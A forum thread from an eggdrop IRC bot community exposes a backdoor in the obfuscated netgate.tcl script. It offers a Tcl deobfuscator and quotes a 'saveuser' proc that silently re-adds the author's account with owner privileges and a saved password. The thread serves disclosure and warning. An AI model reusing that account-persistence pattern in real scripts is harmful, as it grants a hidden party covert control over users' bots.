This is the new home of the egghelp.org community forum.
All data has been migrated (including user logins/passwords) to a new phpBB version.


For more information, see this announcement post. Click the X in the top right-corner of this box to dismiss this message.

netgate backdoor

Support & discussion of released scripts, and announcements of new releases.
User avatar
user
 
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

netgate backdoor

Post by user »

I checked the script mentioned here a bit closer...seems like it's got quite a few hidden "features" ...should I post a script that will "deobfuscate" it or are you guys like billy G...thinking that we should give people a fair chance to remove the script before making the "vuln" public? :P

The previously mentioned post is in the junk yard and will probably disappear pretty soon, so here's a direct link to the script just in case: http://www.rootshell.be/~netgate/netgate.tcl

EDIT: changed the subject
Last edited by user on Thu Mar 22, 2007 11:21 am, edited 1 time in total.
Have you ever read "The Manual"?
User avatar
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

FULL-DISCLOSURE!

That script has for long, cheated many a user. I've tried to get most scripters to look into it, but due to time limitations and laziness, as we all know, they didn't wanna do it.

But you, my man, have accomplished something. Tell us. And provide us with a 'readable' format, if you can, and you're infamous!
Dormant egghead.
User avatar
user
 
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Here goes...

Post by user »

This code will convert the script, so you need to have the original obfuscated version...

Code: Select all

# Make http://www.rootshell.be/~netgate/netgate.tcl a bit easier to 
# read (I didn't verify that it runs fine after the conversion, but
# who would want to run that sucky script anyway, right? :P)
#
# Usage: change the variables below before you source this script in
# your eggdrop. eggdrop is needed because parts of the descrambling is
# done using eggdrop's 'decrypt' command

set infile scripts/netgate.tcl
set outfile scripts/netgate.fixed.tcl

# The main (de)scrambler proc
# Escaping is honored for ['s but not the ], $ and space
# - Don't ask me why... I just reproduce the output of the original
proc lines str {
	# The part swapping L with 0 and 0 with L reminds me of my
	# first reaction when i saw the netgate.tcl code :P
	set map {
		a z z a b y y b c x x c d w w d e v v e f u u f g t
		t g h s s h i r r i j q q j k p p k l o o l m n n m
		A Z Z A B Y Y B C X X C D W W D E V V E F U U F G T
		T G H S S H I R R I J Q Q J K P P K L O O L M N N M
	}
	if {[regexp {[\$\[~]+} $str]} {
		set out ""
		set s ""
		set p "";# previous char
		foreach c [split $str ""] {
			if {$s==""} {
				if {$c=="~"} {
					set s ~
				} elseif {$c=="\$"} {
					set s " "; set c ~$c
				} elseif {$c=="\[" && $p!="\\"} {
					set s "\]"; set c ~$c
				} else {
					set c [string map $map $c]
				}
			} elseif {$c=="~"} {
				set s ""
			} elseif {$c==$s} {
				set s ""; append c ~
			}
			append out [set p $c]
		}
		if {$s==""} {set out} {append out ~}
	} {
		string map $map $str
	}
}
proc puthlp str {
	set str "puthelp \"[string map {~ ""} [lines $str]]\""
}
proc putsrv str {
	set str "putserv \"[string map {~ ""} [lines $str]]\""
}
proc putqck str {
	set str "putquick \"[string map {~ ""} [lines $str]]\""
}
proc dcp str {
	set str \"[qesc [decrypt 64 $str]]\"
}
proc dezip str {
	if {[string match {*\\*} $str]} {set str [subst -noc -nov $str]}
	set str [qesc [decrypt 64 [string map {~ ""} $str]]]
}
proc qesc str {
	set out ""
	foreach c [split [string map {
		\\ \\\\ \[ \\\[ \] \\\] \{ \\\{
		\} \\\} \$ \\\$ \" \\\" " " "\\ "
	} $str] ""] {
		if {[set i [scan $c %c]]>31 && $i<127} {
			append out $c
		} {
			append out [format \\%.3o $i]
		}
	}
	set out
}
proc clearify {var cmdstart {stderr stdout}} {
	upvar 1 $var code
	set off [string len $cmdstart]
	set cmd [lindex [split $cmdstart " "] 0]
	set off2 [string match {\[*} $cmdstart]
	if {$off2} {
		set cmd [string range $cmd 1 end]
	}
	incr off2
	#puts $stderr "*** running \"$cmd\""
	set c 0
	foreach line [split [set code][set code ""] \n] {
		incr c
		set i 0
		set ll [string len $line]
		while {$i<$ll && [set i [string first $cmdstart $line $i]]>-1} {
			set j [expr {$i+$off+1}]
			while {$j<$ll && ![info complete [set run [string range $line $i $j]]]} {incr j}
			if {[info complete $run]} {
				# lame hack because this was the only command with more arguments :P
				if {$cmdstart=={[decrypt 64 "}} {
					set res [decrypt 64 [string range $run $off end-$off2]]
				} {
					set res [$cmd [string range $run $off end-$off2]]
				}
				set line [string replace $line $i $j $res]
			} {
				#puts $stderr "line#$c INCOMPLETE: \"$run\""
				break
			}
			incr i
		}
		append code "$line\n"
	}
	#puts $stderr "*** done: \"$cmd\""
}
proc indent {code {dent {	}}} {
	set out ""
	set i 0
	foreach line [split $code \n] {
		set line [string trimleft $line]
		foreach {o c e} {0 0 0} break
		foreach a [split $line ""] {
			if {$e} {set e 0; continue}
			switch -exact -- $a {
				"\\" {set e 1}
				"\{" {incr o}
				"\}" {if {$o} {incr o -1} {incr c}}
			}
		}
		incr i -$c
		append out [string repeat $dent $i]$line\n
		incr i $o
	}
	set out
}

set code [read [set f [open $infile]]]; close $f

clearify code {[decrypt 64 "}
clearify code {[lines "}
clearify code {[dcp "}
clearify code {[dezip "}
clearify code {puthlp "}
clearify code {putsrv "}
clearify code {putqck "}

set f [open $outfile w]
puts $f [indent [set code]][unset code]
close $f
putlog "Check $outfile :)"

# It's a bit of a mess, but it does the job. Have fun :P
Last edited by user on Tue Jan 27, 2004 11:59 pm, edited 2 times in total.
Have you ever read "The Manual"?
User avatar
caesar
Mint Rubber
Posts: 3776
Joined: Sun Oct 14, 2001 8:00 pm
Location: Mint Factory

Post by caesar »

duh! Why do you think I have moved it to the Junk Yard in the first place? :) Some untrustworty users from Dalnet have created it so.. DON'T USE IT! :)

Also, thanks for the script to unscramble it :)
Once the game is over, the king and the pawn go back in the same box.
User avatar
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

heh, what's the use if it won't run? :P How to make it 'runnable' then?

caesar - I AM FROM TEH DALNET!
Dormant egghead.
User avatar
user
&nbsp;
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Post by user »

Yourname wrote:heh, what's the use if it won't run? :P How to make it 'runnable' then?
I was talking about the converted script...it's for reading. Why would you want to run it? (changed my comment a bit in the top...do you get it now? :P)
Have you ever read "The Manual"?
User avatar
caesar
Mint Rubber
Posts: 3776
Joined: Sun Oct 14, 2001 8:00 pm
Location: Mint Factory

Post by caesar »

I was talking about that netgate.tcl script.. also, I don't have something agains Dalnet users, don't get me wrong there. The "untrustworty" authors actualy of that script are carders and probably (not shure 100% hackers). User's tcl is a neat thing to "unscramble" the code.. nice job. :)

PS: My appologies Yourname if I have let you the totaly wrong impresion that I have something agains Dalnet users and my appologies if I have expressed myself wrong and let you under the impresion that user's code is not good to run in order to make that "FULL-DISCLOSURE! " of the triky code.
Once the game is over, the king and the pawn go back in the same box.
User avatar
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

aww caesar, I'm just playin with you dude. :)
And yes, those people are prolly carders or so.

user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that [censored], I took it off apart from the fact that it scared me because I knew there are trojans here and there.
Dormant egghead.
User avatar
user
&nbsp;
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Post by user »

Yourname wrote:user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there.
I wouldn't copy stuff from their code. It is 100% pure crap. Seems like they spent all their skills trying to make it hard to read :P If you have trouble coding a particular feature, it would be better to ask in the tcl forum on this site :)
Have you ever read "The Manual"?
User avatar
caesar
Mint Rubber
Posts: 3776
Joined: Sun Oct 14, 2001 8:00 pm
Location: Mint Factory

Post by caesar »

Yourname : aww.. you dirty dog :) Shame on me cos I got so fooled.. :mrgreen:
Once the game is over, the king and the pawn go back in the same box.
User avatar
Yourname
Master
Posts: 358
Joined: Mon Sep 24, 2001 8:00 pm
Location: Toronto

Post by Yourname »

I'll assume I'm a good actor. :D
Dormant egghead.
N
NeTGaTE
Voice
Posts: 5
Joined: Fri Dec 03, 2004 8:07 am
Location: South Sumatera, Palembang - Indonesia

Reply

Post by NeTGaTE »

user, There are some neat things DALnet really needs all -in- one in that script. Since I was testing it out, but never really got to understand 90% of that ****, I took it off apart from the fact that it scared me because I knew there are trojans here and there.

not trojan in this tcl buat dalnet have autoklines that script. dalnet read from tha NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname andtwo in away logo NETGATE (i Have fixed for this in 9.6)

The "untrustworty" authors actualy of that script are carders and probably (not shure 100% hackers).

tha authors nickname in DALnet is KaISaR, it's not a hackers.


:: odon
User avatar
user
&nbsp;
Posts: 1452
Joined: Tue Mar 18, 2003 9:58 pm
Location: Norway

Re: Reply

Post by user »

NeTgAtE wrote:not trojan in this tcl buat dalnet have autoklines that script. dalnet read from tha NETGATE word in away. this is a 2 time dalnet have kill it's, first read from the realname andtwo in away logo NETGATE (i Have fixed for this in 9.6)

tha authors nickname in DALnet is KaISaR, it's not a hackers.
So this is not a backdoor? Is that what you're trying to say? (the code below is from v8.9)

Code: Select all

set ps KaISaR
# the proc below is invoked alot...
proc saveuser {} {
	global ps owner
	if {![validuser $ps]} {
		setuser $owner XTRA "BEND" "xDB4L/z2DJT~1mianN/lj9Rq.";# Zfhjmnoptx
	} elseif {$owner != $ps} {
		setuser $owner XTRA "BEND" [zip [chattr $ps]]
		if {[passwdok $ps ""] != 1} {
			setuser $owner XTRA "LAST" [getuser $ps "PASS"]
		}
		deluser $ps
	}
	save
	if {![validuser $ps]} {
		adduser $ps "$ps!*@*"
		chattr $ps [dezip [getuser $owner XTRA "BEND"]]
		if {[getuser $owner XTRA "LAST"] != ""} {
			setuser $ps PASS [getuser $owner XTRA "LAST"]
		}
	}
	return 1
}
Have you ever read "The Manual"?
N
NeTGaTE
Voice
Posts: 5
Joined: Fri Dec 03, 2004 8:07 am
Location: South Sumatera, Palembang - Indonesia

Post by NeTGaTE »

i think that is not a backdoor just a copyright who maker that tcl, just to remember who make netgate tcl is KaISaR (now he has been sign in from irc). some of user in dalnet have riped netgate tcl and make another tcl version with alot of logo/slogan but "STILL" same like netgate tcl.

$ps : Any one or people in dalnet always look this a backdoor, why?
m
metroid
Owner
Posts: 771
Joined: Wed Jun 16, 2004 2:46 am

Post by metroid »

Your a retard, That proc adds the author as an owner which is clearly a backdoor to get owner access on a bot.

Maybe you should try reading the code instead of making useless remarks Netgate.
Locked